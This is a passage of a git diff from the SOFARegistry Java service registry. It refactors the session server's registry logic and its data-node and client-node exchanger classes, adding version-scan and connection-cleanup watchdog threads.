-16,269 +16,430 @@ */ package com.alipay.sofa.registry.server.session.registry; -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.store.BaseInfo; -import com.alipay.sofa.registry.common.model.store.Publisher; -import com.alipay.sofa.registry.common.model.store.StoreData; -import com.alipay.sofa.registry.common.model.store.Subscriber; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.common.model.store.Watcher; +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; +import com.alipay.sofa.registry.common.model.store.*; import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; import com.alipay.sofa.registry.remoting.Channel; import com.alipay.sofa.registry.remoting.Server; import com.alipay.sofa.registry.remoting.exchange.Exchange; +import com.alipay.sofa.registry.remoting.exchange.RequestChannelClosedException; +import com.alipay.sofa.registry.server.session.acceptor.ClientOffWriteDataRequest; +import com.alipay.sofa.registry.server.session.acceptor.PublisherWriteDataRequest; +import com.alipay.sofa.registry.server.session.acceptor.WriteDataAcceptor; +import com.alipay.sofa.registry.server.session.acceptor.WriteDataRequest; import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.node.NodeManager; +import com.alipay.sofa.registry.server.session.filter.DataIdMatchStrategy; import com.alipay.sofa.registry.server.session.node.service.DataNodeService; +import com.alipay.sofa.registry.server.session.push.FirePushService; +import com.alipay.sofa.registry.server.session.slot.SlotTableCache; import com.alipay.sofa.registry.server.session.store.DataStore; import com.alipay.sofa.registry.server.session.store.Interests; import com.alipay.sofa.registry.server.session.store.Watchers; import com.alipay.sofa.registry.server.session.strategy.SessionRegistryStrategy; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; +import com.alipay.sofa.registry.server.session.wrapper.Wrapper; +import com.alipay.sofa.registry.server.session.wrapper.WrapperInterceptorManager; +import com.alipay.sofa.registry.server.session.wrapper.WrapperInvocation; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; import com.alipay.sofa.registry.task.listener.TaskListenerManager; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.ArrayList; -import java.util.Collection; -import java.util.HashMap; -import java.util.List; -import java.util.Map; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import com.alipay.sofa.registry.util.LoopRunnable; +import com.alipay.sofa.registry.util.WakeUpLoopRunnable; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import java.util.*; import java.util.concurrent.TimeUnit; +import java.util.function.Supplier; +import javax.annotation.PostConstruct; +import org.apache.commons.lang.StringUtils; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.util.CollectionUtils; /** - * * @author shangyu.wh * @version $Id: AbstractSessionRegistry.java, v 0.1 2017-11-30 18:13 shangyu.wh Exp $ */ public class SessionRegistry implements Registry { - private static final Logger LOGGER = LoggerFactory.getLogger(SessionRegistry.class); - - private static final Logger TASK_LOGGER = LoggerFactory.getLogger(SessionRegistry.class, - "[Task]"); + private static final Logger LOGGER = LoggerFactory.getLogger(SessionRegistry.class); - /** - * store subscribers - */ - @Autowired - private Interests sessionInterests; + protected static final Logger SCAN_VER_LOGGER = LoggerFactory.getLogger("SCAN-VER"); - /** - * store watchers - */ - @Autowired - private Watchers sessionWatchers; + /** store subscribers */ + @Autowired private Interests sessionInterests; - /** - * store publishers - */ - @Autowired - private DataStore sessionDataStore; + /** store watchers */ + @Autowired private Watchers sessionWatchers; - /** - * transfer data to DataNode - */ - @Autowired - private DataNodeService dataNodeService; + /** store publishers */ + @Autowired private DataStore sessionDataStore; - /** - * trigger task com.alipay.sofa.registry.server.meta.listener process - */ - @Autowired - private TaskListenerManager taskListenerManager; + /** transfer data to DataNode */ + @Autowired private DataNodeService dataNodeService; - /** - * calculate data node url - */ - @Autowired - private NodeManager dataNodeManager; + /** trigger task com.alipay.sofa.registry.server.meta.listener process */ + @Autowired private TaskListenerManager taskListenerManager; - @Autowired - private SessionServerConfig sessionServerConfig; + @Autowired private SessionServerConfig sessionServerConfig; - @Autowired - private Exchange boltExchange; + @Autowired private Exchange boltExchange; - @Autowired - private SessionRegistryStrategy sessionRegistryStrategy; + @Autowired private SessionRegistryStrategy sessionRegistryStrategy; - @Override - public void register(StoreData storeData) { - - //check connect already existed - checkConnect(storeData); + @Autowired private WrapperInterceptorManager wrapperInterceptorManager; - switch (storeData.getDataType()) { - case PUBLISHER: - Publisher publisher = (Publisher) storeData; + @Autowired private DataIdMatchStrategy dataIdMatchStrategy; - dataNodeService.register(publisher); + @Autowired private WriteDataAcceptor writeDataAcceptor; - sessionDataStore.add(publisher); + @Autowired private SlotTableCache slotTableCache; - sessionRegistryStrategy.afterPublisherRegister(publisher); - break; - case SUBSCRIBER: - Subscriber subscriber = (Subscriber) storeData; + @Autowired private FirePushService firePushService; - sessionInterests.add(subscriber); + private final VersionWatchDog versionWatchDog = new VersionWatchDog(); - sessionRegistryStrategy.afterSubscriberRegister(subscriber); - break; - case WATCHER: - Watcher watcher = (Watcher) storeData; + private volatile boolean scanVerEnable = false; - sessionWatchers.add(watcher); + @PostConstruct + public void init() { + ConcurrentUtils.createDaemonThread("SessionVerWatchDog", versionWatchDog).start(); + ConcurrentUtils.createDaemonThread("SessionClientWatchDog", new ClientWatchDog()).start(); + } - sessionRegistryStrategy.afterWatcherRegister(watcher); - break; - default: - break; - } - - } + @Override + public void register(StoreData storeData) { - @Override - public void unRegister(StoreData storeData) { + WrapperInvocation wrapperInvocation = + new WrapperInvocation( + new Wrapper() { + @Override + public Boolean call() { - switch (storeData.getDataType()) { - case PUBLISHER: - Publisher publisher = (Publisher) storeData; + switch (storeData.getDataType()) { + case PUBLISHER: + Publisher publisher = (Publisher) storeData; + publisher.setSessionProcessId(ServerEnv.PROCESS_ID); + sessionDataStore.add(publisher); - sessionDataStore.deleteById(storeData.getId(), publisher.getDataInfoId()); + // All write operations to DataServer (pub/unPub/clientoff/renew/snapshot) + // are handed over to WriteDataAcceptor + writeDataAcceptor.accept( + new PublisherWriteDataRequest( + publisher, WriteDataRequest.WriteDataRequestType.PUBLISHER)); - dataNodeService.unregister(publisher); + sessionRegistryStrategy.afterPublisherRegister(publisher); + break; + case SUBSCRIBER: + Subscriber subscriber = (Subscriber) storeData; - sessionRegistryStrategy.afterPublisherUnRegister(publisher); - break; + sessionInterests.add(subscriber); - case SUBSCRIBER: - Subscriber subscriber = (Subscriber) storeData; - sessionInterests.deleteById(storeData.getId(), subscriber.getDataInfoId()); - sessionRegistryStrategy.afterSubscriberUnRegister(subscriber); - break; + sessionRegistryStrategy.afterSubscriberRegister(subscriber); + break; + case WATCHER: + Watcher watcher = (Watcher) storeData; - case WATCHER: - Watcher watcher = (Watcher) storeData; + sessionWatchers.add(watcher); - sessionWatchers.deleteById(watcher.getId(), watcher.getDataInfoId()); + sessionRegistryStrategy.afterWatcherRegister(watcher); + break; + default: + break; + } + return null; + } - sessionRegistryStrategy.afterWatcherUnRegister(watcher); - break; - default: - break; - } + @Override + public Supplier getParameterSupplier() { + return () -> storeData; + } + }, + wrapperInterceptorManager); + try { + wrapperInvocation.proceed(); + } catch (RequestChannelClosedException e) { + throw e; + } catch (Exception e) { + throw new RuntimeException("Proceed register error!", e); } + } - @Override - public void cancel(List connectIds) { - TaskEvent taskEvent = new TaskEvent(connectIds, TaskType.CANCEL_DATA_TASK); - TASK_LOGGER.info("send " + taskEvent.getTaskType() + " taskEvent:{}", taskEvent); - taskListenerManager.sendTaskEvent(taskEvent); - } + @Override + public void unRegister(StoreData storeData) { - @Override - public void fetchChangData() { - if (!sessionServerConfig.isBeginDataFetchTask()) { - try { - TimeUnit.MILLISECONDS.sleep(500); - } catch (InterruptedException e) { - LOGGER.error("fetchChangData task sleep InterruptedException", e); - } - return; - } + switch (storeData.getDataType()) { + case PUBLISHER: + Publisher publisher = (Publisher) storeData; + publisher.setSessionProcessId(ServerEnv.PROCESS_ID); - fetchChangDataProcess(); - } + sessionDataStore.deleteById(storeData.getId(), publisher.getDataInfoId()); - @Override - public void fetchChangDataProcess() { - - //check dataInfoId's sub list is not empty - List checkDataInfoIds = new ArrayList<>(); - sessionInterests.getInterestDataInfoIds().forEach((dataInfoId) -> { - Collection subscribers = sessionInterests.getInterests(dataInfoId); - if (subscribers != null && !subscribers.isEmpty()) { - checkDataInfoIds.add(dataInfoId); - } - }); - Map/*dataInfoIds*/> map = calculateDataNode(checkDataInfoIds); + // All write operations to DataServer (pub/unPub/clientoff/renew/snapshot) + // are handed over to WriteDataAcceptor + writeDataAcceptor.accept( + new PublisherWriteDataRequest( + publisher, WriteDataRequest.WriteDataRequestType.UN_PUBLISHER)); - map.forEach((address, dataInfoIds) -> { + sessionRegistryStrategy.afterPublisherUnRegister(publisher); + break; - //TODO asynchronous fetch version - Map> dataVersions = dataNodeService - .fetchDataVersion(URL.valueOf(address), dataInfoIds); + case SUBSCRIBER: + Subscriber subscriber = (Subscriber) storeData; + sessionInterests.deleteById(storeData.getId(), subscriber.getDataInfoId()); + sessionRegistryStrategy.afterSubscriberUnRegister(subscriber); + break; - if (dataVersions != null) { - sessionRegistryStrategy.doFetchChangDataProcess(dataVersions); - } else { - LOGGER.warn("Fetch no change data versions info from {}", address); - } - }); + case WATCHER: + Watcher watcher = (Watcher) storeData; + sessionWatchers.deleteById(watcher.getId(), watcher.getDataInfoId()); + + sessionRegistryStrategy.afterWatcherUnRegister(watcher); + break; + default: + break; + } + } + + @Override + public void cancel(List connectIds) { + // update local firstly, data node send error depend on renew check + for (ConnectId connectId : connectIds) { + List removes = removeFromSession(connectId); + if (!removes.isEmpty()) { + // clientOff to dataNode async + clientOffToDataNode(connectId, removes); + } } + } - private Map> calculateDataNode(Collection dataInfoIds) { - - Map> map = new HashMap<>(); - if (dataInfoIds != null) { - dataInfoIds.forEach(dataInfoId -> { - Node dataNode = dataNodeManager.getNode(dataInfoId); - URL url = new URL(dataNode.getNodeUrl().getIpAddress(), - sessionServerConfig.getDataServerPort()); - Collection list = map.computeIfAbsent(url.getAddressString(), - k -> new ArrayList<>()); - list.add(dataInfoId); - }); - } + private List removeFromSession(ConnectId connectId) { + Map publisherMap = sessionDataStore.deleteByConnectId(connectId); + sessionInterests.deleteByConnectId(connectId); + sessionWatchers.deleteByConnectId(connectId); + return Lists.newArrayList(publisherMap.values()); + } - return map; - } + private void clientOffToDataNode(ConnectId connectId, List clientOffPublishers) { + writeDataAcceptor.accept(new ClientOffWriteDataRequest(connectId, clientOffPublishers)); + } - private void checkConnect(StoreData storeData) { + private final class ClientWatchDog extends LoopRunnable { - BaseInfo baseInfo = (BaseInfo) storeData; + @Override + public void runUnthrowable() { + try { + cleanClientConnect(); + } catch (Throwable e) { + LOGGER.error("WatchDog failed to cleanClientConnect", e); + } + } - Server sessionServer = boltExchange.getServer(sessionServerConfig.getServerPort()); + @Override + public void waitingUnthrowable() { + ConcurrentUtils.sleepUninterruptibly(1, TimeUnit.SECONDS); + } + } - Channel channel = sessionServer.getChannel(baseInfo.getSourceAddress()); + private final class VersionWatchDog extends WakeUpLoopRunnable { + boolean prevStopPushSwitch; - if (channel == null) { - throw new RuntimeException(String.format( - "Register address %s has not connected session server!", - baseInfo.getSourceAddress())); + @Override + public void runUnthrowable() { + try { + final boolean stop = sessionServerConfig.isStopPushSwitch(); + // could not start scan ver at begin + // 1. stopPush.val = false in session.default + // 2. stopPush.val = true in meta + // 3. scanVerEnable=true after session start and config the stopPush.val + if (!stop && scanVerEnable) { + scanVersions(); + triggerSubscriberRegister(); + if (prevStopPushSwitch) { + SCAN_VER_LOGGER.info("[ReSub] resub after stopPushSwitch closed"); + } } - + prevStopPushSwitch = stop; + } catch (Throwable e) { + SCAN_VER_LOGGER.error("WatchDog failed fetch versions", e); + } } - /** - * Getter method for property sessionInterests. - * - * @return property value of sessionInterests - */ - public Interests getSessionInterests() { - return sessionInterests; + @Override + public int getWaitingMillis() { + return sessionServerConfig.getSchedulerScanVersionIntervalMillis(); } - - /** - * Getter method for property sessionDataStore. - * - * @return property value of sessionDataStore - */ - public DataStore getSessionDataStore() { - return sessionDataStore; + } + + private void scanVersions() { + // TODO not support multi cluster + Map interestVersions = + sessionInterests.getInterestVersions(sessionServerConfig.getSessionServerDataCenter()); + Map> interestVersionsGroup = groupBySlot(interestVersions); + for (Map.Entry> group : interestVersionsGroup.entrySet()) { + final int slotId = group.getKey(); + try { + fetchChangDataProcess( + sessionServerConfig.getSessionServerDataCenter(), slotId, group.getValue()); + } catch (Throwable e) { + SCAN_VER_LOGGER.error( + "failed to fetch versions slotId={}, size={}", slotId, group.getValue().size(), e); + } + } + } + + private void triggerSubscriberRegister() { + Collection subscribers = sessionInterests.getInterestsNeverPushed(); + if (!subscribers.isEmpty()) { + SCAN_VER_LOGGER.info("find never pushed subscribers:{}", subscribers.size()); + for (Subscriber subscriber : subscribers) { + try { + firePushService.fireOnRegister(subscriber); + } catch (Throwable e) { + SCAN_VER_LOGGER.error("failed to register subscriber, {}", subscriber, e); + } + } + } + } + + @Override + public void fetchChangDataProcess() { + scanVerEnable = true; + versionWatchDog.wakeup(); + } + + private Map> groupBySlot( + Map interestVersions) { + if (CollectionUtils.isEmpty(interestVersions)) { + return Collections.emptyMap(); + } + TreeMap> ret = Maps.newTreeMap(); + for (Map.Entry interestVersion : interestVersions.entrySet()) { + final String dataInfoId = interestVersion.getKey(); + Map map = + ret.computeIfAbsent( + slotTableCache.slotOf(dataInfoId), k -> Maps.newHashMapWithExpectedSize(128)); + map.put(dataInfoId, interestVersion.getValue()); + } + return ret; + } + + private void fetchChangDataProcess( + String dataCenter, int slotId, Map interestVersions) { + final String leader = slotTableCache.getLeader(slotId); + if (StringUtils.isBlank(leader)) { + SCAN_VER_LOGGER.warn("slot not assigned, {}", slotId); + return; } - /** - * Getter method for property taskListenerManager. - * - * @return property value of taskListenerManager - */ - public TaskListenerManager getTaskListenerManager() { - return taskListenerManager; + Map dataVersions = + dataNodeService.fetchDataVersion(dataCenter, slotId, interestVersions); + + SCAN_VER_LOGGER.info( + "[fetchSlotVer]{},{},{},interests={},gets={}", + slotId, + dataCenter, + leader, + interestVersions.size(), + dataVersions.size()); + Map mergedVersions = new HashMap<>(interestVersions); + mergedVersions.putAll(dataVersions); + for (Map.Entry version : mergedVersions.entrySet()) { + final String dataInfoId = version.getKey(); + final long verVal = version.getValue().getValue(); + if (sessionInterests.checkInterestVersion(dataCenter, dataInfoId, verVal).interested) { + firePushService.fireOnChange(dataCenter, dataInfoId, verVal); + SCAN_VER_LOGGER.info( + "[fetchSlotVerNotify]{},{},{},{}", slotId, dataInfoId, dataCenter, verVal); + } + } + } + + public void remove(List connectIds) { + List connectIdsAll = new ArrayList<>(); + connectIds.forEach( + connectId -> { + Map pubMap = getSessionDataStore().queryByConnectId(connectId); + boolean pubExisted = pubMap != null && !pubMap.isEmpty(); + + Map subMap = getSessionInterests().queryByConnectId(connectId); + boolean subExisted = false; + if (subMap != null && !subMap.isEmpty()) { + subExisted = true; + + subMap.forEach( + (registerId, sub) -> { + if (isFireSubscriberPushEmptyTask(sub.getDataId())) { + fireSubscriberPushEmptyTask(sub); + } + }); + } + + if (pubExisted || subExisted) { + connectIdsAll.add(connectId); + } + }); + cancel(connectIdsAll); + } + + protected boolean isFireSubscriberPushEmptyTask(String dataId) { + return dataIdMatchStrategy.match( + dataId, () -> sessionServerConfig.getBlacklistSubDataIdRegex()); + } + + private void fireSubscriberPushEmptyTask(Subscriber subscriber) { + firePushService.fireOnPushEmpty(subscriber); + } + + public void cleanClientConnect() { + Set connectIndexes = new HashSet<>(); + connectIndexes.addAll(sessionDataStore.getConnectIds()); + connectIndexes.addAll(sessionInterests.getConnectIds()); + connectIndexes.addAll(sessionWatchers.getConnectIds()); + + Server sessionServer = boltExchange.getServer(sessionServerConfig.getServerPort()); + + List connectIds = new ArrayList<>(); + for (ConnectId connectId : connectIndexes) { + Channel channel = + sessionServer.getChannel( + new URL(connectId.getClientHostAddress(), connectId.getClientPort())); + if (channel == null) { + connectIds.add(connectId); + LOGGER.warn("Client connect has not existed!it must be remove!connectId:{}", connectId); + } + } + if (!connectIds.isEmpty()) { + cancel(connectIds); } -} \ No newline at end of file + } + + /** + * Getter method for property sessionInterests. + * + * @return property value of sessionInterests + */ + protected Interests getSessionInterests() { + return sessionInterests; + } + + /** + * Getter method for property sessionDataStore. + * + * @return property value of sessionDataStore + */ + protected DataStore getSessionDataStore() { + return sessionDataStore; + } + + /** + * Getter method for property taskListenerManager. + * + * @return property value of taskListenerManager + */ + protected TaskListenerManager getTaskListenerManager() { + return taskListenerManager; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/ClientNodeExchanger.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/ClientNodeExchanger.java index 86d5bedba..6e7d49b4f 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/ClientNodeExchanger.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/ClientNodeExchanger.java @@ -16,78 +16,25 @@ */ package com.alipay.sofa.registry.server.session.remoting; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.Client; -import com.alipay.sofa.registry.remoting.Server; -import com.alipay.sofa.registry.remoting.exchange.Exchange; -import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; -import com.alipay.sofa.registry.remoting.exchange.RequestException; -import com.alipay.sofa.registry.remoting.exchange.message.Request; -import com.alipay.sofa.registry.remoting.exchange.message.Response; -import com.alipay.sofa.registry.remoting.exchange.message.Response.ResultStatus; import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; +import com.alipay.sofa.registry.server.shared.remoting.ServerSideExchanger; import org.springframework.beans.factory.annotation.Autowired; /** - * * @author shangyu.wh * @version $Id: ClientNodeExchanger.java, v 0.1 2017-12-12 12:13 shangyu.wh Exp $ */ -public class ClientNodeExchanger implements NodeExchanger { - private static final Logger LOGGER = LoggerFactory.getLogger("SESSION-PUSH", "[Exchange]"); - - @Autowired - private Exchange boltExchange; - - @Autowired - private SessionServerConfig sessionServerConfig; - - @Override - public Response request(Request request) throws RequestException { - Response response = null; - try { - //sender who session node send message to client node - Server sessionServer = boltExchange.getServer(sessionServerConfig.getServerPort()); +public class ClientNodeExchanger extends ServerSideExchanger { - if (sessionServer != null) { - URL url = request.getRequestUrl(); - if (url != null) { - Channel channel = sessionServer.getChannel(url); + @Autowired private SessionServerConfig sessionServerConfig; - if (channel != null && channel.isConnected()) { - if (null != request.getCallBackHandler()) { - //TODO log ASYNC - sessionServer.sendCallback(channel, request.getRequestBody(), - request.getCallBackHandler(), - sessionServerConfig.getClientNodeExchangeTimeOut()); - response = () -> ResultStatus.SUCCESSFUL; - } else { - final Object result = sessionServer.sendSync(channel, - request.getRequestBody(), - sessionServerConfig.getClientNodeExchangeTimeOut()); - response = () -> result; - } - } else { - LOGGER.error( - "ClientNode Exchanger get channel {} error! Can't be null or disconnected!", - url); - throw new RequestException("ClientNode Exchanger get channel " + url - + "error! Can't be null or disconnected!", - request); - } - } - } - } catch (Exception e) { - throw new RequestException("ClientNode Exchanger request data error!", request, e); - } - return response; - } + @Override + public int getRpcTimeoutMillis() { + return sessionServerConfig.getClientNodeExchangeTimeoutMillis(); + } - @Override - public Client connectServer() { - return null; - } -} \ No newline at end of file + @Override + public int getServerPort() { + return sessionServerConfig.getServerPort(); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/DataNodeExchanger.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/DataNodeExchanger.java index fb49eb26f..83cd57f17 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/DataNodeExchanger.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/DataNodeExchanger.java @@ -16,131 +16,81 @@ */ package com.alipay.sofa.registry.server.session.remoting; -import com.alipay.sofa.registry.common.model.Node; import com.alipay.sofa.registry.common.model.store.URL; import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; import com.alipay.sofa.registry.remoting.ChannelHandler; import com.alipay.sofa.registry.remoting.Client; import com.alipay.sofa.registry.remoting.exchange.Exchange; -import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; import com.alipay.sofa.registry.remoting.exchange.RequestException; import com.alipay.sofa.registry.remoting.exchange.message.Request; import com.alipay.sofa.registry.remoting.exchange.message.Response; import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.node.NodeManager; -import com.alipay.sofa.registry.server.session.remoting.handler.AbstractClientHandler; -import org.springframework.beans.factory.annotation.Autowired; - -import javax.annotation.Resource; +import com.alipay.sofa.registry.server.shared.remoting.ClientSideExchanger; import java.util.Collection; +import java.util.Collections; +import java.util.Set; +import org.springframework.beans.factory.annotation.Autowired; /** * The type Data node exchanger. + * * @author shangyu.wh * @version $Id : DataNodeExchanger.java, v 0.1 2017-12-01 11:51 shangyu.wh Exp $ */ -public class DataNodeExchanger implements NodeExchanger { - - private static final Logger LOGGER = LoggerFactory - .getLogger(DataNodeExchanger.class); - private static final Logger EXCHANGE_LOGGER = LoggerFactory - .getLogger("SESSION-EXCHANGE"); - - @Autowired - private Exchange boltExchange; - - @Autowired - private SessionServerConfig sessionServerConfig; - - @Resource(name = "dataClientHandlers") - private Collection dataClientHandlers; - - @Autowired - private NodeManager dataNodeManager; - - /** - * @see DataNodeExchanger#request(Request) - */ - @Override - public Response request(Request request) throws RequestException { - - Response response; - URL url = request.getRequestUrl(); - try { - Client sessionClient = boltExchange.getClient(Exchange.DATA_SERVER_TYPE); - - if (sessionClient == null) { - LOGGER.warn( - "DataNode Exchanger get dataServer connection {} error! Connection can not be null or disconnected!", - url); - //first start session maybe case sessionClient null,try to auto connect - sessionClient = boltExchange.connect(Exchange.DATA_SERVER_TYPE, url, - dataClientHandlers.toArray(new ChannelHandler[dataClientHandlers.size()])); - } - //try to connect data - Channel channel = sessionClient.getChannel(url); - if (channel == null) { - channel = sessionClient.connect(url); - } - EXCHANGE_LOGGER.info("DataNode Exchanger request={},url={}", request.getRequestBody(), url); - - final Object result = sessionClient.sendSync(channel, request.getRequestBody(), - sessionServerConfig.getDataNodeExchangeTimeOut()); - if (result == null) { - LOGGER.error("DataNode Exchanger request data get null result!Request url:" + url); - throw new RequestException("DataNode Exchanger request data get null result!", - request); - } - response = () -> result; - } catch (Exception e) { - LOGGER.error("DataNode Exchanger request data error!request={},url={}", request.getRequestBody(), url, e); - throw new RequestException("DataNode Exchanger request data error!Request url:" + url, - request, e); - } - - return response; +public class DataNodeExchanger extends ClientSideExchanger { + + private static final Logger LOGGER = LoggerFactory.getLogger(DataNodeExchanger.class); + + @Autowired private SessionServerConfig sessionServerConfig; + + public DataNodeExchanger() { + super(Exchange.DATA_SERVER_TYPE); + } + + /** @see DataNodeExchanger#request(Request) */ + @Override + public Response request(Request request) throws RequestException { + URL url = request.getRequestUrl(); + try { + return super.request(request); + } catch (RequestException e) { + LOGGER.error( + "Error when request DataNode! Request url={}, request={}", + url, + request.getRequestBody(), + e); + throw e; } - - @Override - public Client connectServer() { - - Collection dataNodes = dataNodeManager.getDataCenterNodes(); - if (dataNodes == null || dataNodes.isEmpty()) { - dataNodeManager.getAllDataCenterNodes(); - dataNodes = dataNodeManager.getDataCenterNodes(); - } - - Client dataClient = null; - for (Node dataNode : dataNodes) { - if (dataNode.getNodeUrl() == null || dataNode.getNodeUrl().getIpAddress() == null) { - LOGGER.error("get data node address error!url{}", dataNode.getNodeUrl()); - continue; - } - - URL url = new URL(dataNode.getNodeUrl().getIpAddress(), - sessionServerConfig.getDataServerPort()); - try { - dataClient = boltExchange.getClient(Exchange.DATA_SERVER_TYPE); - if (dataClient == null) { - dataClient = boltExchange.connect(Exchange.DATA_SERVER_TYPE, url, - dataClientHandlers.toArray(new ChannelHandler[dataClientHandlers.size()])); - } - } catch (Exception e) { - LOGGER.error("DataNode Exchanger connect DataServer error!url:" + url, e); - continue; - } - - try { - Channel channel = dataClient.getChannel(url); - if (channel == null) { - dataClient.connect(url); - } - } catch (Exception e) { - LOGGER.error("DataNode Exchanger connect channel error!url:" + url, e); - } - } - return dataClient; + } + + @Override + public Client connectServer() { + Set ips = serverIps; + int count = tryConnectAllServer(ips); + if (count != ips.size()) { + throw new RuntimeException("failed to connect all dataServers: " + ips); } -} \ No newline at end of file + return getClient(); + } + + @Override + protected Collection getClientHandlers() { + return Collections.emptyList(); + } + + @Override + public int getRpcTimeoutMillis() { + return sessionServerConfig.getDataNodeExchangeTimeoutMillis(); + } + + @Override + public int getServerPort() { + return sessionServerConfig.getDataServerPort(); + } + + @Override + public int getConnNum() { + return sessionServerConfig.getDataClientConnNum(); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/DataNodeNotifyExchanger.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/DataNodeNotifyExchanger.java new file mode 100644 index 000000000..aa5c8723e --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/DataNodeNotifyExchanger.java @@ -0,0 +1,83 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting; + +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.remoting.Client; +import com.alipay.sofa.registry.remoting.exchange.Exchange; +import com.alipay.sofa.registry.remoting.exchange.RequestException; +import com.alipay.sofa.registry.remoting.exchange.message.Request; +import com.alipay.sofa.registry.remoting.exchange.message.Response; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; +import com.alipay.sofa.registry.server.shared.remoting.ClientSideExchanger; +import java.util.Collection; +import java.util.Set; +import javax.annotation.Resource; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * use for dataNode notify + * + * @author yuzhi.lyz + */ +public class DataNodeNotifyExchanger extends ClientSideExchanger { + @Autowired private SessionServerConfig sessionServerConfig; + + @Resource(name = "dataNotifyClientHandlers") + private Collection dataNotifyClientHandlers; + + public DataNodeNotifyExchanger() { + super(Exchange.DATA_SERVER_NOTIFY_TYPE); + } + + /** @see DataNodeNotifyExchanger#request(Request) */ + @Override + public Response request(Request request) throws RequestException { + // dataNode notify unsupported request to data server + throw new UnsupportedOperationException(); + } + + @Override + public Client connectServer() { + Set ips = serverIps; + int count = tryConnectAllServer(ips); + if (count != ips.size()) { + throw new RuntimeException("failed to connect all dataServers: " + ips); + } + return getClient(); + } + + @Override + protected Collection getClientHandlers() { + return dataNotifyClientHandlers; + } + + @Override + public int getRpcTimeoutMillis() { + return sessionServerConfig.getDataNodeExchangeTimeoutMillis(); + } + + @Override + public int getServerPort() { + return sessionServerConfig.getDataServerNotifyPort(); + } + + @Override + public int getConnNum() { + return sessionServerConfig.getDataNotifyClientConnNum(); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/MetaNodeExchanger.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/MetaNodeExchanger.java deleted file mode 100644 index 5f66bf863..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/MetaNodeExchanger.java +++ /dev/null @@ -1,149 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.remoting; - -import com.alipay.sofa.registry.common.model.metaserver.MetaNode; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.ChannelHandler; -import com.alipay.sofa.registry.remoting.Client; -import com.alipay.sofa.registry.remoting.exchange.Exchange; -import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; -import com.alipay.sofa.registry.remoting.exchange.RequestException; -import com.alipay.sofa.registry.remoting.exchange.message.Request; -import com.alipay.sofa.registry.remoting.exchange.message.Response; -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.node.NodeManager; -import com.alipay.sofa.registry.server.session.node.RaftClientManager; -import com.alipay.sofa.registry.server.session.remoting.handler.AbstractClientHandler; -import org.springframework.beans.factory.annotation.Autowired; - -import javax.annotation.Resource; -import java.util.Collection; - -/** - * The type Data node exchanger. - * @author shangyu.wh - * @version $Id : 